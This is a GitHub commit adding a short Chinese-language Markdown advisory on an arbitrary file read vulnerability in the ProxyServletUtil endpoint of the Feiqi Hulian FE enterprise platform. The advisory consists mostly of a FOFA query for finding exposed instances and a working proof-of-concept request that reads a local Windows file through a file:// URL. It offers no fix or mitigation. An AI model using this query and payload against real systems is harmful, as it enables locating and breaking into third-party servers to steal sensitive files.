Create 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞.md

This commit is contained in:
wy876
2024-04-17 20:02:02 +08:00
committed by GitHub
parent 8616603a03
commit 1a6a645e47

View File

@@ -0,0 +1,15 @@
## 飞企互联-FE企业运营管理平台ProxyServletUti存在任意文件读取漏洞
飞企互联FE业务协作平台中的ProxyServletUti接口存在任意文件读取漏洞。攻击者可以通过构造特定请求读取服务器上的敏感文件。
## fofa
```
app="飞企互联-FE企业运营管理平台"
```
## poc
```
/ProxyServletUtil?url=file:///c:/Windows/win.ini
```